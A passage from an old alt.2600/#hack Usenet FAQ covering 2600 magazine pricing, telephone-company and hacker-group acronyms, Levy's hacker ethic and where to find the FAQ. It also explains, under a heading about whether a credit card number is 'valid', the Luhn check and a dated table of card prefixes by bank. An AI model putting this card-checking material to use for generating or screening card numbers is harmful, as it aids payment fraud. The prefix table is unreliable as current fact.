think 2600 should be in the bookstore.  Be sure to include the

bookstores name and address.





05. Why does 2600 cost more to subscribe to than to buy at a newsstand?



A note from Emmanuel Goldstein:



  We've been selling 2600 at the same newsstand price ($4) since 1988

  and we hope to keep it at that price for as long as we can get away

  with it. At the same time, $21 is about the right price to cover

  subscriber costs, including postage and record keeping, etc. People

  who subscribe don't have to worry about finding an issue someplace,

  they tend to get issues several weeks before the newsstands get

  them, and they can take out free ads in the 2600 Marketplace.



  This is not uncommon in the publishing industry.  The NY Times, for

  example, costs $156.50 at the newsstands, and $234.75 delivered to your

  door.









Section E: Miscellaneous

~~~~~~~~~~~~~~~~~~~~~~~~



01. What does XXX stand for?



TLA     Three Letter Acronym



ACL     Access Control List

PIN     Personal Identification Number

TCB     Trusted Computing Base



ALRU    Automatic Line Record Update

AN      Associated Number

ARSB    Automated Repair Service Bureau

ATH     Abbreviated Trouble History

BOC     Bell Operating Company

BOR     Basic Output Report

BOSS    Business Office Servicing System

CA      Cable

COE     Central Office Equipment

COSMOS  Computer System for Main Frame Operations

CMC     Construction Maintenance Center

CNID    Calling Number IDentification

CO      Central Office

COCOT   Customer Owned Coin Operated Telephone

CRSAB   Centralized Repair Service Answering Bureau

DDD     Direct Distance Dialing

ECC     Enter Cable Change

LD      Long Distance

LMOS    Loop Maintenance Operations System

MLT     Mechanized Loop Testing

NPA     Numbering Plan Area

POTS    Plain Old Telephone Service

RBOC    Regional Bell Operating Company

RSB     Repair Service Bureau

SS      Special Service

TAS     Telephone Answering Service

TH      Trouble History

TREAT   Trouble Report Evaluation and Analysis Tool



LOD     Legion of Doom

HFC     Hell Fire Club

TNO     The New Order



ACiD    Ansi Creators in Demand

CCi     Cybercrime International

FLT     Fairlight

iCE     Insane Creators Enterprise

iNC     International Network of Crackers

NTA     The Nocturnal Trading Alliance

PDX     Paradox

PE      Public Enemy

PSY     Psychose

QTX     Quartex

RZR     Razor (1911)

S!P     Supr!se Productions

TDT     The Dream Team

THG     The Humble Guys

THP     The Hill People

TRSI    Tristar Red Sector Inc.





02. How do I determine if I have a valid credit card number?



Credit cards use the Luhn Check Digit Algorithm.  The main purpose of

this algorithm is to catch data entry errors, but it does double duty

here as a weak security tool.



For a card with an even number of digits, double every odd numbered

digit and subtract 9 if the product is greater than 9.  Add up all the

even digits as well as the doubled-odd digits, and the result must be

a multiple of 10 or it's not a valid card.  If the card has an odd

number of digits, perform the same addition doubling the even numbered

digits instead.





03. What bank issued this credit card?



1033    Manufacturers Hanover Trust

1035    Citibank

1263    Chemical Bank

1665    Chase Manhattan

4024    Bank of America

4128    Citicorp

4209    New Era Bank

4302    HHBC

4310    Imperial Savings

4313    MBNA

4317    California Federal

5282    Wells Fargo

5424    Citibank

5410    Wells Fargo

5432    Bank of New York

6017    MBNA





04. What are the ethics of hacking?



The FAQ answer is excerpted from: Hackers: Heroes of the Computer Revolution

                                  by Steven Levy



Access to computers -- and anything which might teach you something

about the way the world works -- should be unlimited and total.

Always yield to the Hands-On imperative.



All information should be free.



Mistrust Authority.  Promote Decentralization.



Hackers should be judged by their hacking, not bogus criteria such as

degrees, age, race, or position.



You can create art and beauty on a computer.



Computers can change your life for the better.





04. Where can I get a copy of the alt.2600/#hack FAQ?



Get it on FTP at:

rahul.net /pub/lps

rtfm.mit.edu /pub/usenet-by-group/alt.2600



Get it on the World Wide Web at:

http://dfw.net/~aleph1

http://www.engin.umich.edu/~jgotts/underground.html

http://www.phantom.com/~king



Get it by E-Mail at:

hackfaq@sekurity.com  (Subject: send faq)









EOT



-- 

\* Will Spencer        : The advancement and diffusion of knowledge *\

\* Unix geek           : is the only guardian of true liberty.      *\

\* PC guru             :               --  James Madison            *\

\* Revolutionary       :               4th U.S. President           *\

